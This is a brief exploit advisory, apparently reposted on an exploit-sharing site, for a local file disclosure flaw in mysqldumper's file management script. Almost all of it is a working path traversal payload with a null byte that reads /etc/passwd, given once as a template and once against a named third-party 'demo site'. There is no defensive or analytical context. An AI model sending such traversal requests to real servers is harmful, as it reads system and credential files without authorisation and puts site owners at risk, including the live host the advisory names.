id: 11848
date: 04/17/2010
title: mysqldumper Local File Vulnerability
author: qexle
cves: 

====================================
mysqldumper Local File Vulnerability
====================================

mysqldumper Local File Vulnerability

Software : all version
Software site:   : http://www.mysqldumper.net/
Author   : tetikci $ miktolyn + qexle
Contact  : ucaksavar@hotmail.com.tr



 -=[ Exploit ]=-

site//mysqldumper/filemanagement.php?action=dl&f=../../../../../../../../../../etc/passwd%00

demo site: http://jorgemidis.com/mysqldumper/filemanagement.php?action=dl&f=../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-24]  #